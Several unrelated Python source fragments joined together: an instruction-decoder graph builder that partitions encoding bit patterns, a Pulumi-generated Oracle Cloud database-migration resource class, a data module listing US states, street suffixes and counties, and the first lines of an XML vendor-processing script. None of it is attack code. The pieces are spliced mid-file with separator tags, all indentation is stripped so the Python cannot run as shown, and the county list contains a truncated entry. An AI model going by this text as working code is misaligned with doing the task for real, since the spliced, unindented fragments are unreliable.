t = i.ipattern.bits[nbitpos].token
if t not in candidate_ods:
candidate_ods.append(t)
if len(candidate_ods) == 0:
msge("REARRANGE: NO CANDIDATE OD")
return False
retry = True
for candidate_od in candidate_ods:
if retry == False:
break
msge("REARRANGE ATTEMPT using %s" % (candidate_od))
retry = False
for i in ilist:
if i.ipattern.bits[bitpos].is_operand_decider():
if candidate_od == i.ipattern.bits[bitpos].token:
msge("\tSKIPPING %s inum %d -- already fine" %
( i.get_iclass(), i.inum))
else:
msge("\tREARRANGE needs to juggle: %s inum %d" %
( i.get_iclass(), i.inum))
# attempt to juggle ODs in i.ipattern.bits to get
# candidate_od in to bitpos
if move_candidate_od_to_front(bitpos,
candidate_od,
i.ipattern.bits):
msge("\tREARRANGE one pattern worked for %s inum %d" %
( i.get_iclass(), i.inum))
else:
retry = True
msge("\tREARRANGE FAILED for %s. Trying again..." %
(candidate_od))
break # hit the outer loop
if retry == True:
msge("REARRANGE FAILED for all ODs")
return False
# make sure they are all the same OD at this bitpos now
candidate_od = None
for i in ilist:
if i.ipattern.bits[bitpos].is_operand_decider():
if candidate_od == None:
candidate_od = i.ipattern.bits[bitpos].token
elif candidate_od != i.ipattern.bits[bitpos].token:
msge("REARRANGE FAILED AT END(1)! bitpos = %d" % (bitpos))
msge( i.dump_str() )
return False
else:
print_node(ilist)
msge("REARRANGE FAILED AT END(2)!")
return False
msge("REARRANGE: FIXED OD CONFLICT!")
# since we rearranged, we need to renumber the pbits or the
# extraction will not work properly.
renumber_bitpos(ilist)
return True
def some_funky_spot(ilist,bitpos):
"""Return true if some pattern has a nonterminal or operand decider"""
for i in ilist:
if bitpos < len(i.ipattern.bits):
if i.ipattern.bits[bitpos].is_nonterminal():
return True
if i.ipattern.bits[bitpos].is_operand_decider():
return True
return False
def print_split(others,ones,zeros,brief=False):
for s,lst in [('Others',others),
('Ones', ones),
('Zeros', zeros)]:
msge(s +': ')
for ii in lst:
try:
msge( ii.dump_str(brief=brief))
except:
msge( "XUNKNOWN: " + str(ii) )
def partition_nodes(ilist,bitpos):
"""return a tuple of lists of nodes whose next bit is zero, one or
a letter (others)"""
zeros = []
ones = []
others = []
zero = '0'
one= '1'
for inst in ilist:
bit = inst.ipattern.bits[bitpos]
if bit.value == zero:
zeros.append(inst)
elif bit.value == one:
ones.append(inst)
else:
others.append(inst)
return (ones,zeros,others)
def print_node(ilist):
for ii in ilist:
msge("\t" + ii.dump_str(brief=True))
def at_end_of_instructions(ilist, bitpos):
"""If all instructions are done with their bits, return 1
None). Check for length problems too. If not done, return 0.
If there is an error, return -1"""
done = False
notdone = False
for ii in ilist:
if isinstance(ii,tuple):
die("Bad tuple where instruction expected: "+ str(ii))
if bitpos >= len(ii.ipattern.bits):
done = True
else:
notdone = True
if done:
if notdone:
msge("Length error: some instructions done and some" +
" are not done simultaneously")
msge("ilist len = " + str(len(ilist)))
msge("\n\nILIST:")
for ii in ilist:
msge( 'bitpos:' + str(bitpos) +
' len-pattern:' + str( len(ii.ipattern.bits)))
if (len(ii.ipattern.bits)) == 0:
msge("BAD INST: %s" % ( str(ii)))
msge("\n\nNODE:")
print_node(ilist)
#die("Dying")
return -1 # problem: some done, some not done
return 1 # all is well, all done
return 0 # not done yet
def no_dont_cares(instructions, bitpos):
"Return True if there are no don't cares"
for i in instructions:
if i.ipattern.bits[bitpos].is_dont_care():
return False
return True
def some_different(instructions,bitpos):
"""Return True if there are ones and zeros and no don't cares,
nonterminals or operand deciders"""
zero = '0'
one= '1'
zeros = 0
ones = 0
for i in instructions:
if i.ipattern.bits[bitpos].value == zero:
zeros += 1
elif i.ipattern.bits[bitpos].value == one:
ones += 1
if zeros > 0 and ones > 0:
return True
return False
def scan_backwards_for_distinguishing_bit(instructions,bitpos):
"""Return a tuple (t/f, bitpos) that says where we can partition
this node further (when possible)."""
b = bitpos - 1
while b >= 0:
if no_dont_cares(instructions,b):
if some_different(instructions,b):
msge("FALLBACK: we can parition on the 1s and 0s at bitpos " +
str(b))
return (True, b)
b = b - 1
msge("FALLBACK: No bits left to examine: at bit %d" % (bitpos))
return (False, None)
def convert_splitpos_to_bit_index(graph,splitpos):
"""Convert the fake bitposition in splitpos in to a real bit
position by skipping leading operand deciders. Intervening
nonterminals might mess this up??? FIXME
"""
i = graph.instructions[0]
real_bits = 0
for b in i.ipattern.bits[0:splitpos]:
if not b.is_operand_decider():
real_bits += 1
msge("BACKSPLIT fake bitpos: %d real bitpos: %d\n" % (splitpos, real_bits))
return real_bits
def back_split_graph(common, graph, bitpos, skipped_bits, splitpos):
"""Partition based on splitpos and then recur in to build_sub_graph
for the partitions."""
options = common.options
msge("back_split_graph: based on " + str(splitpos))
(ones,zeros,others) = partition_nodes(graph.instructions,splitpos)
if vbuild():
s = "ones %d zeros %d others %d" % (len(ones), len(zeros), len(others))
msge('back_split_graph: ' + s )
if len(others) > 0:
die("We encountered some junk on a back-split")
if len(zeros) == 0:
die("We didn't have any zeros in the back-split partition")
if len(ones) == 0:
die("We didn't have any ones in the back-split partition")
graph.skipped_bits = skipped_bits
graph.decider_bits = 1
graph.back_split_pos = convert_splitpos_to_bit_index(graph,splitpos)
# zero child node
znode = new_node(graph,'0',bitpos)
znode.instructions.extend(zeros)
build_sub_graph(common,znode,bitpos, 0) # RECUR
# one child node
onode = new_node(graph,'1',bitpos)
onode.instructions.extend(ones)
build_sub_graph(common,onode,bitpos, 0) # RECUR
# global hack -- FIXME: 2007-07-10 to get the operand storage
# dictionary in to
# partition_by_required_values.
g_operand_storage_dict = None
def build_sub_graph(common, graph, bitpos, skipped_bits):
"""Recursively partition instructions based on 1s, 0s and
placeholder letters"""
global g_operand_storage_dict
options = common.options
# expand_dont_cares is an important control for the graph
# building. If expand_dont_cares is false, whenever we see a
# don't-care in some thing at the next bit position, then we skip
# that bit in the graph formation. This leads to problems when
# skipped 1s and 0s are required | |
<gh_stars>1-10
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['MigrationArgs', 'Migration']
@pulumi.input_type
class MigrationArgs:
def __init__(__self__, *,
compartment_id: pulumi.Input[str],
source_database_connection_id: pulumi.Input[str],
target_database_connection_id: pulumi.Input[str],
type: pulumi.Input[str],
agent_id: Optional[pulumi.Input[str]] = None,
data_transfer_medium_details: Optional[pulumi.Input['MigrationDataTransferMediumDetailsArgs']] = None,
datapump_settings: Optional[pulumi.Input['MigrationDatapumpSettingsArgs']] = None,
defined_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
display_name: Optional[pulumi.Input[str]] = None,
exclude_objects: Optional[pulumi.Input[Sequence[pulumi.Input['MigrationExcludeObjectArgs']]]] = None,
freeform_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
golden_gate_details: Optional[pulumi.Input['MigrationGoldenGateDetailsArgs']] = None,
source_container_database_connection_id: Optional[pulumi.Input[str]] = None,
vault_details: Optional[pulumi.Input['MigrationVaultDetailsArgs']] = None):
"""
The set of arguments for constructing a Migration resource.
:param pulumi.Input[str] compartment_id: (Updatable) OCID of the compartment where the secret containing the credentials will be created.
:param pulumi.Input[str] source_database_connection_id: (Updatable) The OCID of the Source Database Connection.
:param pulumi.Input[str] target_database_connection_id: (Updatable) The OCID of the Target Database Connection.
:param pulumi.Input[str] type: (Updatable) Migration type.
:param pulumi.Input[str] agent_id: (Updatable) The OCID of the registered ODMS Agent. Required for OFFLINE Migrations.
:param pulumi.Input['MigrationDataTransferMediumDetailsArgs'] data_transfer_medium_details: (Updatable) Data Transfer Medium details for the Migration. If not specified, it will default to Database Link. Only one type of medium details can be specified.
:param pulumi.Input['MigrationDatapumpSettingsArgs'] datapump_settings: (Updatable) Optional settings for Datapump Export and Import jobs
:param pulumi.Input[Mapping[str, Any]] defined_tags: (Updatable) Defined tags for this resource. Each key is predefined and scoped to a namespace. Example: `{"foo-namespace.bar-key": "value"}`
:param pulumi.Input[str] display_name: (Updatable) Migration Display Name
:param pulumi.Input[Sequence[pulumi.Input['MigrationExcludeObjectArgs']]] exclude_objects: (Updatable) Database objects to exclude from migration.
:param pulumi.Input[Mapping[str, Any]] freeform_tags: (Updatable) Simple key-value pair that is applied without any predefined name, type or scope. Exists for cross-compatibility only. Example: `{"bar-key": "value"}`
:param pulumi.Input['MigrationGoldenGateDetailsArgs'] golden_gate_details: (Updatable) Details about Oracle GoldenGate Microservices. Required for online logical migration.
:param pulumi.Input[str] source_container_database_connection_id: (Updatable) The OCID of the Source Container Database Connection. Only used for ONLINE migrations. Only Connections of type Non-Autonomous can be used as source container databases.
:param pulumi.Input['MigrationVaultDetailsArgs'] vault_details: (Updatable) Oracle Cloud Infrastructure Vault details to store migration and connection credentials secrets
"""
pulumi.set(__self__, "compartment_id", compartment_id)
pulumi.set(__self__, "source_database_connection_id", source_database_connection_id)
pulumi.set(__self__, "target_database_connection_id", target_database_connection_id)
pulumi.set(__self__, "type", type)
if agent_id is not None:
pulumi.set(__self__, "agent_id", agent_id)
if data_transfer_medium_details is not None:
pulumi.set(__self__, "data_transfer_medium_details", data_transfer_medium_details)
if datapump_settings is not None:
pulumi.set(__self__, "datapump_settings", datapump_settings)
if defined_tags is not None:
pulumi.set(__self__, "defined_tags", defined_tags)
if display_name is not None:
pulumi.set(__self__, "display_name", display_name)
if exclude_objects is not None:
pulumi.set(__self__, "exclude_objects", exclude_objects)
if freeform_tags is not None:
pulumi.set(__self__, "freeform_tags", freeform_tags)
if golden_gate_details is not None:
pulumi.set(__self__, "golden_gate_details", golden_gate_details)
if source_container_database_connection_id is not None:
pulumi.set(__self__, "source_container_database_connection_id", source_container_database_connection_id)
if vault_details is not None:
pulumi.set(__self__, "vault_details", vault_details)
@property
@pulumi.getter(name="compartmentId")
def compartment_id(self) -> pulumi.Input[str]:
"""
(Updatable) OCID of the compartment where the secret containing the credentials will be created.
"""
return pulumi.get(self, "compartment_id")
@compartment_id.setter
def compartment_id(self, value: pulumi.Input[str]):
pulumi.set(self, "compartment_id", value)
@property
@pulumi.getter(name="sourceDatabaseConnectionId")
def source_database_connection_id(self) -> pulumi.Input[str]:
"""
(Updatable) The OCID of the Source Database Connection.
"""
return pulumi.get(self, "source_database_connection_id")
@source_database_connection_id.setter
def source_database_connection_id(self, value: pulumi.Input[str]):
pulumi.set(self, "source_database_connection_id", value)
@property
@pulumi.getter(name="targetDatabaseConnectionId")
def target_database_connection_id(self) -> pulumi.Input[str]:
"""
(Updatable) The OCID of the Target Database Connection.
"""
return pulumi.get(self, "target_database_connection_id")
@target_database_connection_id.setter
def target_database_connection_id(self, value: pulumi.Input[str]):
pulumi.set(self, "target_database_connection_id", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
(Updatable) Migration type.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter(name="agentId")
def agent_id(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) The OCID of the registered ODMS Agent. Required for OFFLINE Migrations.
"""
return pulumi.get(self, "agent_id")
@agent_id.setter
def agent_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "agent_id", value)
@property
@pulumi.getter(name="dataTransferMediumDetails")
def data_transfer_medium_details(self) -> Optional[pulumi.Input['MigrationDataTransferMediumDetailsArgs']]:
"""
(Updatable) Data Transfer Medium details for the Migration. If not specified, it will default to Database Link. Only one type of medium details can be specified.
"""
return pulumi.get(self, "data_transfer_medium_details")
@data_transfer_medium_details.setter
def data_transfer_medium_details(self, value: Optional[pulumi.Input['MigrationDataTransferMediumDetailsArgs']]):
pulumi.set(self, "data_transfer_medium_details", value)
@property
@pulumi.getter(name="datapumpSettings")
def datapump_settings(self) -> Optional[pulumi.Input['MigrationDatapumpSettingsArgs']]:
"""
(Updatable) Optional settings for Datapump Export and Import jobs
"""
return pulumi.get(self, "datapump_settings")
@datapump_settings.setter
def datapump_settings(self, value: Optional[pulumi.Input['MigrationDatapumpSettingsArgs']]):
pulumi.set(self, "datapump_settings", value)
@property
@pulumi.getter(name="definedTags")
def defined_tags(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
(Updatable) Defined tags for this resource. Each key is predefined and scoped to a namespace. Example: `{"foo-namespace.bar-key": "value"}`
"""
return pulumi.get(self, "defined_tags")
@defined_tags.setter
def defined_tags(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "defined_tags", value)
@property
@pulumi.getter(name="displayName")
def display_name(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) Migration Display Name
"""
return pulumi.get(self, "display_name")
@display_name.setter
def display_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "display_name", value)
@property
@pulumi.getter(name="excludeObjects")
def exclude_objects(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MigrationExcludeObjectArgs']]]]:
"""
(Updatable) Database objects to exclude from migration.
"""
return pulumi.get(self, "exclude_objects")
@exclude_objects.setter
def exclude_objects(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['MigrationExcludeObjectArgs']]]]):
pulumi.set(self, "exclude_objects", value)
@property
@pulumi.getter(name="freeformTags")
def freeform_tags(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
(Updatable) Simple key-value pair that is applied without any predefined name, type or scope. Exists for cross-compatibility only. Example: `{"bar-key": "value"}`
"""
return pulumi.get(self, "freeform_tags")
@freeform_tags.setter
def freeform_tags(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "freeform_tags", value)
@property
@pulumi.getter(name="goldenGateDetails")
def golden_gate_details(self) -> Optional[pulumi.Input['MigrationGoldenGateDetailsArgs']]:
"""
(Updatable) Details about Oracle GoldenGate Microservices. Required for online logical migration.
"""
return pulumi.get(self, "golden_gate_details")
@golden_gate_details.setter
def golden_gate_details(self, value: Optional[pulumi.Input['MigrationGoldenGateDetailsArgs']]):
pulumi.set(self, "golden_gate_details", value)
@property
@pulumi.getter(name="sourceContainerDatabaseConnectionId")
def source_container_database_connection_id(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) The OCID of the Source Container Database Connection. Only used for ONLINE migrations. Only Connections of type Non-Autonomous can be used as source container databases.
"""
return pulumi.get(self, "source_container_database_connection_id")
@source_container_database_connection_id.setter
def source_container_database_connection_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "source_container_database_connection_id", value)
@property
@pulumi.getter(name="vaultDetails")
def vault_details(self) -> Optional[pulumi.Input['MigrationVaultDetailsArgs']]:
"""
(Updatable) Oracle Cloud Infrastructure Vault details to store migration and connection credentials secrets
"""
return pulumi.get(self, "vault_details")
@vault_details.setter
def vault_details(self, value: Optional[pulumi.Input['MigrationVaultDetailsArgs']]):
pulumi.set(self, "vault_details", value)
@pulumi.input_type
class _MigrationState:
def __init__(__self__, *,
agent_id: Optional[pulumi.Input[str]] = None,
compartment_id: Optional[pulumi.Input[str]] = None,
credentials_secret_id: Optional[pulumi.Input[str]] = None,
data_transfer_medium_details: Optional[pulumi.Input['MigrationDataTransferMediumDetailsArgs']] = None,
datapump_settings: Optional[pulumi.Input['MigrationDatapumpSettingsArgs']] = None,
defined_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
display_name: Optional[pulumi.Input[str]] = None,
exclude_objects: Optional[pulumi.Input[Sequence[pulumi.Input['MigrationExcludeObjectArgs']]]] = None,
executing_job_id: Optional[pulumi.Input[str]] = None,
freeform_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
golden_gate_details: Optional[pulumi.Input['MigrationGoldenGateDetailsArgs']] = None,
lifecycle_details: Optional[pulumi.Input[str]] = None,
source_container_database_connection_id: Optional[pulumi.Input[str]] = None,
source_database_connection_id: Optional[pulumi.Input[str]] = None,
state: Optional[pulumi.Input[str]] = None,
system_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
target_database_connection_id: Optional[pulumi.Input[str]] = None,
time_created: Optional[pulumi.Input[str]] = None,
time_last_migration: Optional[pulumi.Input[str]] = None,
time_updated: Optional[pulumi.Input[str]] = None,
type: Optional[pulumi.Input[str]] = None,
vault_details: Optional[pulumi.Input['MigrationVaultDetailsArgs']] = None,
wait_after: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering Migration resources.
:param pulumi.Input[str] agent_id: (Updatable) The OCID of the registered ODMS Agent. Required for OFFLINE Migrations.
:param pulumi.Input[str] compartment_id: (Updatable) OCID of the compartment where the secret containing the credentials will be created.
:param pulumi.Input[str] credentials_secret_id: OCID of the Secret in the Oracle Cloud Infrastructure vault containing the Migration credentials. Used to store Golden Gate admin user credentials.
:param pulumi.Input['MigrationDataTransferMediumDetailsArgs'] data_transfer_medium_details: (Updatable) Data Transfer Medium details for the Migration. If not specified, it will default to Database Link. Only one type of medium details can be specified.
:param pulumi.Input['MigrationDatapumpSettingsArgs'] datapump_settings: (Updatable) Optional settings for Datapump Export and Import jobs
:param pulumi.Input[Mapping[str, Any]] defined_tags: (Updatable) Defined tags for this resource. Each key is predefined and scoped to a namespace. Example: `{"foo-namespace.bar-key": "value"}`
:param pulumi.Input[str] display_name: (Updatable) Migration Display Name
:param pulumi.Input[Sequence[pulumi.Input['MigrationExcludeObjectArgs']]] exclude_objects: (Updatable) Database objects to exclude from migration.
:param pulumi.Input[str] executing_job_id: OCID of the current ODMS Job in execution for the Migration, if any.
:param pulumi.Input[Mapping[str, Any]] freeform_tags: (Updatable) Simple key-value pair that is applied without any predefined name, type or scope. Exists for cross-compatibility only. Example: `{"bar-key": "value"}`
:param pulumi.Input['MigrationGoldenGateDetailsArgs'] golden_gate_details: (Updatable) Details about Oracle GoldenGate Microservices. Required for online logical migration.
:param pulumi.Input[str] lifecycle_details: Additional status related to the execution and current state of the Migration.
:param pulumi.Input[str] source_container_database_connection_id: (Updatable) The OCID of the Source Container Database Connection. Only used for ONLINE migrations. Only Connections of type Non-Autonomous can be used as source container databases.
:param pulumi.Input[str] source_database_connection_id: (Updatable) The OCID of the Source Database Connection.
:param pulumi.Input[str] state: The current state of the Migration Resource.
:param pulumi.Input[Mapping[str, Any]] system_tags: Usage of system tag keys. These predefined keys are scoped to namespaces. Example: `{"orcl-cloud.free-tier-retained": "true"}`
:param pulumi.Input[str] target_database_connection_id: (Updatable) The OCID of the | |
STATES = (
('AK', 'Alaska'),
('AL', 'Alabama'),
('AR', 'Arkansas'),
('AZ', 'Arizona'),
('CA', 'California'),
('CO', 'Colorado'),
('CT', 'Connecticut'),
('DC', 'District of Columbia'),
('DE', 'Delaware'),
('FL', 'Florida'),
('GA', 'Georgia'),
('HI', 'Hawaii'),
('IA', 'Iowa'),
('ID', 'Idaho'),
('IL', 'Illinois'),
('IN', 'Indiana'),
('KS', 'Kansas'),
('KY', 'Kentucky'),
('LA', 'Louisiana'),
('MA', 'Massachusetts'),
('MD', 'Maryland'),
('ME', 'Maine'),
('MI', 'Michigan'),
('MN', 'Minnesota'),
('MO', 'Missouri'),
('MS', 'Mississippi'),
('MT', 'Montana'),
('NC', 'North Carolina'),
('ND', 'North Dakota'),
('NE', 'Nebraska'),
('NH', 'New Hampshire'),
('NJ', 'New Jersey'),
('NM', 'New Mexico'),
('NV', 'Nevada'),
('NY', 'New York'),
('OH', 'Ohio'),
('OK', 'Oklahoma'),
('OR', 'Oregon'),
('PA', 'Pennsylvania'),
('RI', 'Rhode Island'),
('SC', 'South Carolina'),
('SD', 'South Dakota'),
('TN', 'Tennessee'),
('TX', 'Texas'),
('UT', 'Utah'),
('VA', 'Virginia'),
('VI', 'Virgin Islands'),
('VT', 'Vermont'),
('WA', 'Washington'),
('WI', 'Wisconsin'),
('WV', 'West Virginia'),
('WY', 'Wyoming'),
)
NUM_STATES = len(STATES)
STREET_SUFFIX = (
'Alley',
'Annex',
'Arcade',
'Avenue',
'Bend',
'Bay',
'Brae',
'Boulevard',
'Bypass',
'Circle',
'Close',
'Concession',
'Court',
'Cove',
'Crescent',
'Drive',
'Drung',
'Esplanade',
'Expressway',
'Extension',
'Ferry',
'Field',
'Freeway',
'Garden',
'Gardens',
'Gate',
'Glen',
'Green',
'Grove',
'Heights',
'High',
'Highway',
'Hill',
'Lane',
'Line',
'Loop',
'Mall',
'Manor',
'Mews',
'Nene',
'Parade',
'Park',
'Parkway',
'Path',
'Pike',
'Place',
'Plantation',
'Plaza',
'Point',
'Private',
'Promenade',
'Road',
'Side',
'Sideline',
'Route',
'Row',
'Run',
'Spur',
'Square',
'Stravenue',
'Street',
'Terrace',
'Thruway',
'Trace',
'Trail',
'Turnpike',
'Townline',
'Viaduct',
'Walk',
'Way',
'Wood',
'Wynd',
)
NUM_STREET_SUFFIXES = len(STREET_SUFFIX)
YEARS = 1998, 1999, 2000, 2001, 2002
GENDERS = 'M', 'F'
MARITAL_STATUSES = 'D', 'M', 'S', 'U', 'W'
EDUCATION_STATUSES = (
'2 yr Degree',
'4 yr Degree',
'Advanced Degree',
'College',
'Primary',
'Secondary',
'Unknown',
)
CATEGORIES = (
'Books',
'Children',
'Electronics',
'Home',
'Jewelry',
'Men',
'Music',
'Shoes',
'Sports',
'Women',
)
COUNTIES = (
'Abbeville County',
'Acadia Parish',
'Accomack County',
'Ada County',
'Adair County',
'Adams County',
'Addison County',
'Aiken County',
'Aitkin County',
'Alachua County',
'Alamance County',
'Alameda County',
'Alamosa County',
'Albany County',
'Albemarle County',
'Alcona County',
'Alcorn County',
'Aleutians East Borough',
'Aleutians West Census Area',
'Alexander County',
'Alexandria city',
'Alfalfa County',
'Alger County',
'Allamakee County',
'Allegan County',
'Allegany County',
'Alleghany County',
'Allegheny County',
'Allen County',
'Allendale County',
'Allen Parish',
'Alpena County',
'Alpine County',
'Amador County',
'Amelia County',
'Amherst County',
'Amite County',
'Anchorage Borough',
'Anderson County',
'Andrew County',
'Andrews County',
'Androscoggin County',
'Angelina County',
'Anne Arundel County',
'Anoka County',
'Anson County',
'Antelope County',
'Antrim County',
'Apache County',
'Appanoose County',
'Appling County',
'Appomattox County',
'Aransas County',
'Arapahoe County',
'Archer County',
'Archuleta County',
'Arenac County',
'Arkansas County',
'Arlington County',
'Armstrong County',
'Aroostook County',
'Arthur County',
'Ascension Parish',
'Ashe County',
'Ashland County',
'Ashley County',
'Ashtabula County',
'Asotin County',
'Assumption Parish',
'Atascosa County',
'Atchison County',
'Athens County',
'Atkinson County',
'Atlantic County',
'Atoka County',
'Attala County',
'Audrain County',
'Audubon County',
'Auglaize County',
'Augusta County',
'Aurora County',
'Austin County',
'Autauga County',
'Avery County',
'Avoyelles Parish',
'Baca County',
'Bacon County',
'Bailey County',
'Baker County',
'Baldwin County',
'Ballard County',
'Baltimore city',
'Baltimore County',
'Bamberg County',
'Bandera County',
'Banks County',
'Banner County',
'Bannock County',
'Baraga County',
'Barber County',
'Barbour County',
'Barnes County',
'Barnstable County',
'Barnwell County',
'Barren County',
'Barron County',
'Barrow County',
'Barry County',
'Bartholomew County',
'Barton County',
'Bartow County',
'Bastrop County',
'Bates County',
'Bath County',
'Baxter County',
'Bay County',
'Bayfield County',
'Baylor County',
'Beadle County',
'Bear Lake County',
'Beaufort County',
'Beauregard Parish',
'Beaver County',
'Beaverhead County',
'Becker County',
'Beckham County',
'Bedford city',
'Bedford County',
'Bee County',
'Belknap County',
'Bell County',
'Belmont County',
'Beltrami County',
'Benewah County',
'Ben Hill County',
'Bennett County',
'Bennington County',
'Benson County',
'Bent County',
'Benton County',
'Benzie County',
'Bergen County',
'Berkeley County',
'Berks County',
'Berkshire County',
'Bernalillo County',
'Berrien County',
'Bertie County',
'Bethel Census Area',
'Bexar County',
'Bibb County',
'Bienville Parish',
'Big Horn County',
'Big Stone County',
'Billings County',
'Bingham County',
'Blackford County',
'Black Hawk County',
'Bladen County',
'Blaine County',
'Blair County',
'Blanco County',
'Bland County',
'Bleckley County',
'Bledsoe County',
'Blount County',
'Blue Earth County',
'Boise County',
'Bolivar County',
'Bollinger County',
'Bond County',
'Bon Homme County',
'Bonner County',
'Bonneville County',
'Boone County',
'Borden County',
'Bosque County',
'Bossier Parish',
'Botetourt County',
'Bottineau County',
'Boulder County',
'Boundary County',
'Bourbon County',
'Bowie County',
'Bowman County',
'Box Butte County',
'Box Elder County',
'Boyd County',
'Boyle County',
'Bracken County',
'Bradford County',
'Bradley County',
'Branch County',
'Brantley County',
'Braxton County',
'Brazoria County',
'Brazos County',
'Breathitt County',
'Breckinridge County',
'Bremer County',
'Brevard County',
'Brewster County',
'Briscoe County',
'Bristol Bay Borough',
'Bristol city',
'Bristol County',
'Broadwater County',
'Bronx County',
'Brooke County',
'Brookings County',
'Brooks County',
'Broome County',
'Broward County',
'Brown County',
'Brule County',
'Brunswick County',
'Bryan County',
'Buchanan County',
'Buckingham County',
'Bucks County',
'Buena Vista city',
'Buena Vista County',
'Buffalo County',
'Bullitt County',
'Bulloch County',
'Bullock County',
'Buncombe County',
'Bureau County',
'Burke County',
'Burleigh County',
'Burleson County',
'Burlington County',
'Burnet County',
'Burnett County',
'Burt County',
'Butler County',
'Butte County',
'Butts County',
'Cabarrus County',
'Cabell County',
'Cache County',
'Caddo County',
'Caddo Parish',
'Calaveras County',
'Calcasieu Parish',
'Caldwell County',
'Caldwell Parish',
'Caledonia County',
'Calhoun County',
'Callahan County',
'Callaway County',
'Calloway County',
'Calumet County',
'Calvert County',
'Camas County',
'Cambria County',
'Camden County',
'Cameron County',
'Cameron Parish',
'Campbell County',
'Camp County',
'Canadian County',
'Candler County',
'Cannon County',
'Canyon County',
'Cape Girardeau County',
'Cape May County',
'Carbon County',
'Caribou County',
'Carlisle County',
'Carlton County',
'Caroline County',
'Carroll County',
'Carson City',
'Carson County',
'Carter County',
'Carteret County',
'Carver County',
'Cascade County',
'Casey County',
'Cass County',
'Cassia County',
'Castro County',
'Caswell County',
'Catahoula Parish',
'Catawba County',
'Catoosa County',
'Catron County',
'Cattaraugus County',
'Cavalier County',
'Cayuga County',
'Cecil County',
'Cedar County',
'Centre County',
'Cerro Gordo County',
'Chaffee County',
'Chambers County',
'Champaign County',
'Chariton County',
'Charle',
'Charles City County',
'Charles County',
'Charles Mix County',
'Charleston County',
'Charlevoix County',
'Charlotte County',
'Charlottesville city',
'Charlton County',
'Chase County',
'Chatham County',
'Chattahoochee County',
'Chattooga County',
'Chautauqua County',
'Chaves County',
'Cheatham County',
'Cheboygan County',
'Chelan County',
'Chemung County',
'Chenango County',
'Cherokee County',
'Cherry County',
'Chesapeake city',
'Cheshire County',
'Chester County',
'Chesterfield County',
'Cheyenne County',
'Chickasaw County',
'Chicot County',
'Childress County',
'Chilton County',
'Chippewa County',
'Chisago County',
'Chittenden County',
'Choctaw County',
'Chouteau County',
'Chowan County',
'Christian County',
'Churchill County',
'Cibola County',
'Cimarron County',
'Citrus County',
'Clackamas County',
'Claiborne County',
'Claiborne Parish',
'Clallam County',
'Clare County',
'Clarendon County',
'Clarion County',
'Clark County',
'Clarke County',
'Clatsop County',
'Clay County',
'Clayton County',
'Clear Creek County',
'Clearfield County',
'Clearwater County',
'Cleburne County',
'Clermont County',
'Cleveland County',
'Clifton Forge city',
'Clinch County',
'Clinton County',
'Cloud County',
'Coahoma County',
'Coal County',
'Cobb County',
'Cochise County',
'Cochran County',
'Cocke County',
'Coconino County',
'Codington County',
'Coffee County',
'Coffey County',
'Coke County',
'Colbert County',
'Cole County',
'Coleman County',
'Coles County',
'Colfax County',
'Colleton County',
'Collier County',
'Collin County',
'Collingsworth County',
'Colonial Heights city',
'Colorado County',
'Colquitt County',
'Columbia County',
'Columbiana County',
'Columbus County',
'Colusa County',
'Comal County',
'Comanche County',
'Concho County',
'Concordia Parish',
'Conecuh County',
'Conejos County',
'Contra Costa County',
'Converse County',
'Conway County',
'Cook County',
'Cooke County',
'Cooper County',
'Coosa County',
'Coos County',
'Copiah County',
'Corson County',
'Cortland County',
'Coryell County',
'Coshocton County',
'Costilla County',
'Cottle County',
'Cotton County',
'Cottonwood County',
'Covington city',
'Covington County',
'Coweta County',
'Cowley County',
'Cowlitz County',
'Craig County',
'Craighead County',
'Crane County',
'Craven County',
'Crawford County',
'Creek County',
'Crenshaw County',
'Crisp County',
'Crittenden County',
'Crockett County',
'Crook County',
'Crosby County',
'Cross County',
'Crowley County',
'Crow Wing County',
'Culberson County',
'Cullman County',
'Culpeper County',
'Cumberland County',
'Cuming County',
'Currituck County',
'Curry County',
'Custer County',
'Cuyahoga County',
'Dade County',
'Daggett County',
'Dakota County',
'Dale County',
'Dallam County',
'Dallas County',
'Dane County',
'Daniels County',
'Danville city',
'Dare County',
'Darke County',
'Darlington County',
'Dauphin County',
'Davidson County',
'Davie County',
'Daviess County',
'Davis County',
'Davison County',
'Dawes County',
'Dawson County',
'Day County',
'Deaf Smith County',
'Dearborn County',
'DeBaca County',
'Decatur County',
'Deer Lodge County',
'Defiance County',
'De Kalb County',
'DeKalb County',
'Delaware County',
'Del Norte County',
'Delta County',
'Denali Borough',
'Dent County',
'Denton County',
'Denver County',
'Deschutes County',
'Desha County',
'Des Moines County',
'DeSoto County',
'De Soto Parish',
'Deuel County',
'Dewey County',
'De Witt County',
'DeWitt County',
'Dickens County',
'Dickenson County',
'Dickey County',
'Dickinson County',
'Dickson County',
'Dillingham Census Area',
'Dillon County',
'Dimmit County',
'Dinwiddie County',
'District of Columbia',
'Divide County',
'Dixie County',
'Dixon County',
'Doddridge County',
'Dodge County',
| |
<gh_stars>1-10
#!/usr/bin/env python3
import sys
import getopt
import xml.etree.ElementTree as ET
def processVendors(outFile, vendors):
